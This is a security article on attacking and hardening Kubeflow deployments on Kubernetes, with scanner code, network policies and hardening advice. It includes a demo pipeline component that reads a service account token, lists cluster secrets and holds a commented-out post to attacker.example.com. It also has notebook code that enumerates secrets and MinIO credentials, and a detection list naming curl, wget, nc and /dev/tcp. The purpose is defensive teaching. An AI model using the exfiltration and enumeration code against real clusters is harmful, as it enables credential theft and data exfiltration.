Kubeflow Security
Security assessment and hardening of Kubeflow ML pipeline deployments on Kubernetes.
Overview
Kubeflow is an open-source ML platform built on Kubernetes that provides components for every stage of the ML lifecycle: notebook servers for experimentation, Kubeflow Pipelines for workflow orchestration, KServe (formerly KFServing) for model serving, Katib for hyperparameter tuning, and a training operator for distributed training. Each component runs as a Kubernetes deployment with its own service account, network exposure, and access to cluster resources.
The security challenge with Kubeflow is that it layers a complex multi-component ML platform on top of an already complex Kubernetes infrastructure. Each component introduces its own attack surface, and the interactions between components create additional risks. A compromised notebook server can access pipeline secrets, a malicious pipeline step can exfiltrate training data, and a vulnerable KServe deployment can serve poisoned models.
Kubeflow deployments have been the subject of real-world attacks. In 2020, Microsoft reported that attackers targeted misconfigured Kubeflow dashboards exposed to the internet to deploy cryptocurrency miners on the underlying Kubernetes clusters. The fundamental issue was the same as with MLflow: the default deployment prioritizes developer convenience over security, and many organizations deploy Kubeflow without hardening it.
This article covers the attack surface of each Kubeflow component, provides practical assessment techniques, and details the hardening steps required for production deployments. The attacks described here map to MITRE ATLAS techniques for ML infrastructure exploitation.
Kubeflow Architecture and Attack Surface
Component Map
┌──────────────────────────────────────────────────────────┐
│ Kubeflow Dashboard │
│ (Istio VirtualService / Ingress) │
├──────────┬──────────┬──────────┬──────────┬──────────────┤
│ Notebook │ Pipeline │ KServe │ Katib │ Training │
│ Servers │ Service │ (Serving)│ (HPO) │ Operator │
├──────────┴──────────┴──────────┴──────────┴──────────────┤
│ Kubernetes Cluster (RBAC, NetworkPolicy) │
├──────────────────────────────────────────────────────────┤
│ Storage (PVCs, S3, MinIO) + GPU Resources │
└──────────────────────────────────────────────────────────┘
Each component has its own attack surface:
| Component | Attack Surface | Key Risks |
|---|---|---|
| Central Dashboard | Web UI, Istio ingress | Authentication bypass, SSRF |
| Notebook Servers | Jupyter environments with cluster access | Code execution, lateral movement |
| Pipelines | Argo Workflows, pipeline definitions | Pipeline injection, secret exfiltration |
| KServe | Model serving inference endpoints | Model poisoning, DoS |
| Katib | Hyperparameter tuning controller | Resource exhaustion, config tampering |
| Training Operator | TFJob, PyTorchJob, MPIJob | Privilege escalation via training pods |
Authentication and Multi-Tenancy
Kubeflow uses Istio for network routing and optionally integrates with Dex or OIDC providers for authentication. Multi-tenancy is implemented through Kubernetes namespaces — each user or team gets a profile that maps to a namespace.
import subprocess
import json
from typing import Dict, List, Any
class KubeflowSecurityScanner:
"""Scan a Kubeflow deployment for security misconfigurations."""
def __init__(self, namespace: str = "kubeflow"):
self.namespace = namespace
def _kubectl(self, *args) -> str:
"""Run a kubectl command and return output."""
result = subprocess.run(
["kubectl", *args],
capture_output=True, text=True, timeout=30,
)
return result.stdout
def check_dashboard_exposure(self) -> Dict[str, Any]:
"""Check if the Kubeflow dashboard is externally accessible."""
# Check for LoadBalancer or NodePort services
services = json.loads(
self._kubectl("get", "svc", "-n", "istio-system", "-o", "json")
)
findings = []
for svc in services.get("items", []):
svc_type = svc.get("spec", {}).get("type", "ClusterIP")
name = svc.get("metadata", {}).get("name", "")
if svc_type in ("LoadBalancer", "NodePort"):
external_ip = None
if svc_type == "LoadBalancer":
ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress", [])
if ingress:
external_ip = ingress[0].get("ip") or ingress[0].get("hostname")
findings.append({
"service": name,
"type": svc_type,
"external_ip": external_ip,
"severity": "high",
"finding": f"Istio service '{name}' is externally accessible via {svc_type}",
})
return {"findings": findings}
def check_rbac_permissions(self) -> List[Dict]:
"""Audit RBAC permissions for Kubeflow service accounts."""
findings = []
# Get all service accounts in the kubeflow namespace
sa_json = json.loads(
self._kubectl("get", "sa", "-n", self.namespace, "-o", "json")
)
for sa in sa_json.get("items", []):
sa_name = sa.get("metadata", {}).get("name", "")
# Check what each service account can do
result = subprocess.run(
["kubectl", "auth", "can-i", "--list",
f"--as=system:serviceaccount:{self.namespace}:{sa_name}"],
capture_output=True, text=True, timeout=30,
)
# Check for dangerous permissions
dangerous_perms = ["*", "secrets", "pods/exec", "create pods"]
for line in result.stdout.split("\n"):
for perm in dangerous_perms:
if perm in line.lower():
findings.append({
"service_account": sa_name,
"permission": line.strip(),
"severity": "high",
"finding": f"Service account '{sa_name}' has elevated permission",
})
return findings
def check_network_policies(self) -> Dict[str, Any]:
"""Check for network policy enforcement."""
policies = json.loads(
self._kubectl("get", "networkpolicy", "-n", self.namespace, "-o", "json")
)
policy_count = len(policies.get("items", []))
if policy_count == 0:
return {
"severity": "high",
"finding": "No NetworkPolicies in kubeflow namespace",
"detail": "All pods can communicate freely with each other and external services",
"remediation": "Apply default-deny NetworkPolicy and whitelist required traffic",
}
return {
"severity": "info",
"finding": f"{policy_count} NetworkPolicies found",
"policies": [
p.get("metadata", {}).get("name") for p in policies.get("items", [])
],
}Notebook Server Exploitation
Attack Vector: Notebook to Cluster
Kubeflow notebook servers are Jupyter environments that run as Kubernetes pods. They are intended for data science experimentation, but they provide a powerful attack platform because:
- They run with a service account that may have broad Kubernetes API access
- They can mount PersistentVolumeClaims containing training data
- They have network access to other Kubeflow services
- They can execute arbitrary code by design
"""
Demonstration: Lateral movement from a compromised Kubeflow notebook server.
This shows what an attacker can do after gaining access to a notebook.
"""
import subprocess
import json
from typing import List, Dict
class NotebookLateralMovement:
"""Assess lateral movement paths from a Kubeflow notebook server."""
def discover_service_account(self) -> Dict:
"""Discover the service account token mounted in this pod."""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
try:
with open(token_path) as f:
token = f.read().strip()
with open(namespace_path) as f:
namespace = f.read().strip()
return {
"has_token": True,
"namespace": namespace,
"token_preview": token[:20] + "...",
}
except FileNotFoundError:
return {"has_token": False}
def enumerate_accessible_secrets(self) -> List[Dict]:
"""List Kubernetes secrets accessible from this notebook."""
result = subprocess.run(
["kubectl", "get", "secrets", "-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode != 0:
return [{"error": "Cannot list secrets", "detail": result.stderr}]
secrets = json.loads(result.stdout)
return [
{
"name": s.get("metadata", {}).get("name"),
"type": s.get("type"),
"namespace": s.get("metadata", {}).get("namespace"),
}
for s in secrets.get("items", [])
]
def enumerate_pipeline_artifacts(self) -> List[Dict]:
"""Discover pipeline artifacts accessible from this notebook."""
# Check for MinIO credentials (commonly used by Kubeflow Pipelines)
minio_creds = {}
try:
result = subprocess.run(
["kubectl", "get", "secret", "mlpipeline-minio-artifact",
"-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode == 0:
secret = json.loads(result.stdout)
minio_creds = {
"found": True,
"keys": list(secret.get("data", {}).keys()),
}
except Exception:
minio_creds = {"found": False}
return [{"minio_credentials": minio_creds}]
def check_cross_namespace_access(self, target_namespace: str) -> Dict:
"""Test if this notebook can access resources in other namespaces."""
checks = {}
# Try to list pods in another namespace
result = subprocess.run(
["kubectl", "get", "pods", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_pods"] = result.returncode == 0
# Try to list secrets in another namespace
result = subprocess.run(
["kubectl", "get", "secrets", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_secrets"] = result.returncode == 0
return {
"target_namespace": target_namespace,
"cross_namespace_access": checks,
"severity": "critical" if any(checks.values()) else "info",
}Hardening Notebook Servers
# Example: Restricted PodSecurityPolicy for Kubeflow notebooks
# Apply via Kubernetes admission controller or OPA/Gatekeeper
apiVersion: v1
kind: Pod
metadata:
name: notebook-security-example
namespace: kubeflow-user-namespace
spec:
serviceAccountName: restricted-notebook-sa
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 100
seccompProfile:
type: RuntimeDefault
containers:
- name: notebook
image: kubeflownotebookswg/jupyter:latest
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: false # Jupyter needs write access
capabilities:
drop:
- ALL
resources:
limits:
cpu: "4"
memory: "8Gi"
nvidia.com/gpu: "1"
requests:
cpu: "1"
memory: "2Gi"
volumeMounts:
- name: workspace
mountPath: /home/jovyan
volumes:
- name: workspace
persistentVolumeClaim:
claimName: user-workspace-pvcPipeline Security
Pipeline Definition Injection
Kubeflow Pipelines are defined as Python functions using the KFP SDK and compiled into Argo Workflow specifications (YAML). If an attacker can modify a pipeline definition, they can inject arbitrary code that runs with the pipeline's service account permissions.
"""
Demonstration: How pipeline definition injection works.
A malicious pipeline step can exfiltrate data or credentials.
"""
from kfp import dsl
from kfp.dsl import component
# Legitimate pipeline component
@component(base_image="python:3.11-slim")
def train_model(data_path: str, model_path: str) -> str:
"""Normal training step."""
# ... legitimate training code ...
return model_path
# Injected malicious component — could be added by modifying the pipeline source
@component(base_image="python:3.11-slim", packages_to_install=["requests"])
def exfiltrate_secrets() -> str:
"""
Malicious component that exfiltrates Kubernetes secrets.
This demonstrates the risk of pipeline injection.
"""
import subprocess
import requests
# Read the service account token
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
token = f.read()
# Enumerate secrets using the Kubernetes API
result = subprocess.run(
["wget", "-qO-", "--header", f"Authorization: Bearer {token}",
"https://kubernetes.default.svc/api/v1/secrets"],
capture_output=True, text=True,
)
# In a real attack, this would be exfiltrated to an external server
# requests.post("https://attacker.example.com/collect", data=result.stdout)
return "done"
# Pipeline with injected step
@dsl.pipeline(name="compromised-pipeline")
def compromised_pipeline(data_path: str = "s3://data/train"):
# Legitimate step
train_task = train_model(data_path=data_path, model_path="s3://models/output")
# Injected step — runs with pipeline service account permissions
# This would be hidden in a large pipeline definition
exfil_task = exfiltrate_secrets()
exfil_task.after(train_task)Securing Pipeline Definitions
- Sign pipeline definitions and verify signatures before execution
- Review pipeline YAML for unexpected container images or commands
- Restrict pipeline service account permissions to minimum required
- Use admission controllers to block pipelines that reference unauthorized images
import hashlib
import hmac
import json
from typing import Dict
class PipelineIntegrityVerifier:
"""Verify the integrity of Kubeflow pipeline definitions."""
def __init__(self, signing_key: bytes):
self.signing_key = signing_key
def sign_pipeline(self, pipeline_yaml: str) -> str:
"""Create an HMAC signature for a pipeline definition."""
return hmac.new(
self.signing_key,
pipeline_yaml.encode(),
hashlib.sha256,
).hexdigest()
def verify_pipeline(self, pipeline_yaml: str, expected_signature: str) -> bool:
"""Verify a pipeline definition's signature."""
actual_signature = self.sign_pipeline(pipeline_yaml)
return hmac.compare_digest(actual_signature, expected_signature)
def scan_pipeline_for_risks(self, pipeline_spec: Dict) -> list:
"""Scan a compiled pipeline spec for security risks."""
risks = []
templates = pipeline_spec.get("spec", {}).get("templates", [])
allowed_images = {
"python:3.11-slim",
"gcr.io/ml-pipeline/", # Prefix matching
}
for template in templates:
container = template.get("container", {})
image = container.get("image", "")
# Check for unauthorized images
if not any(image.startswith(allowed) for allowed in allowed_images):
risks.append({
"risk": "unauthorized_image",
"template": template.get("name"),
"image": image,
"severity": "high",
})
# Check for privilege escalation
security_ctx = container.get("securityContext", {})
if security_ctx.get("privileged", False):
risks.append({
"risk": "privileged_container",
"template": template.get("name"),
"severity": "critical",
})
# Check for suspicious commands
commands = container.get("command", []) + container.get("args", [])
suspicious = ["curl", "wget", "nc", "ncat", "/dev/tcp"]
for cmd in commands:
for susp in suspicious:
if susp in str(cmd):
risks.append({
"risk": "suspicious_command",
"template": template.get("name"),
"command": cmd,
"severity": "medium",
})
return risksKServe Security
KServe (formerly KFServing) is Kubeflow's model serving component. It deploys models as Kubernetes services with autoscaling, canary deployments, and inference graph support.
Key Security Concerns
- Inference endpoints may be exposed without authentication
- Model storage credentials are stored as Kubernetes secrets
- Custom predictor containers can contain arbitrary code
- Inference graphs chain multiple services, amplifying the blast radius of a single compromise
#!/bin/bash
# Audit KServe inference services for security issues
echo "=== KServe Security Audit ==="
# List all InferenceServices across namespaces
echo "[*] InferenceServices:"
kubectl get inferenceservice --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for item in data.get('items', []):
name = item['metadata']['name']
ns = item['metadata']['namespace']
url = item.get('status', {}).get('url', 'N/A')
print(f' {ns}/{name}: {url}')
"
# Check if InferenceServices are exposed externally
echo "[*] External exposure:"
kubectl get svc -n istio-system -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for svc in data.get('items', []):
if svc['spec'].get('type') in ('LoadBalancer', 'NodePort'):
name = svc['metadata']['name']
svc_type = svc['spec']['type']
print(f' WARNING: {name} is exposed via {svc_type}')
"
# Check for model storage secrets
echo "[*] Model storage secrets:"
kubectl get secrets --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for secret in data.get('items', []):
name = secret['metadata']['name']
if any(kw in name.lower() for kw in ['storage', 'model', 's3', 'gcs', 'azure']):
ns = secret['metadata']['namespace']
print(f' {ns}/{name} (type: {secret.get(\"type\", \"unknown\")})')
"Network Policies
Default-Deny with Selective Allow
Apply network policies to restrict communication between Kubeflow components:
# Default deny all ingress/egress in Kubeflow namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: kubeflow
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
---
# Allow Kubeflow dashboard to reach pipeline service
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-dashboard-to-pipelines
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: ml-pipeline
ingress:
- from:
- podSelector:
matchLabels:
app: centraldashboard
ports:
- protocol: TCP
port: 8888
---
# Allow pipeline pods to access artifact storage
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-pipeline-to-minio
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: minio
ingress:
- from:
- podSelector:
matchLabels:
pipelines.kubeflow.org/enabled: "true"
ports:
- protocol: TCP
port: 9000Defensive Recommendations
- Never expose the Kubeflow dashboard to the internet — use a VPN or identity-aware proxy
- Enable Istio strict mTLS for all inter-service communication
- Apply least-privilege RBAC to all Kubeflow service accounts, especially notebook and pipeline service accounts
- Implement NetworkPolicies with default-deny and explicit allow rules
- Sign and verify pipeline definitions before execution
- Restrict container images in pipelines to an approved registry using an admission controller
- Audit cross-namespace access regularly — notebook servers should not access other users' namespaces
- Monitor for anomalous resource usage that may indicate cryptomining or data exfiltration
- Use OPA/Gatekeeper policies to enforce security constraints on all Kubeflow workloads
References
- Microsoft Security Blog — "Cryptomining campaigns targeting Kubeflow" (2020) — real-world attack on misconfigured Kubeflow deployments
- Kubeflow Security Documentation — https://www.kubeflow.org/docs/started/security/
- Kubeflow Pipelines — https://www.kubeflow.org/docs/components/pipelines/
- KServe Documentation — https://kserve.github.io/website/
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise), AML.T0040 (ML-Enabled Product/Service)
- NIST AI RMF — Govern 1.7 (AI system isolation), Map 3.4 (AI deployment risks)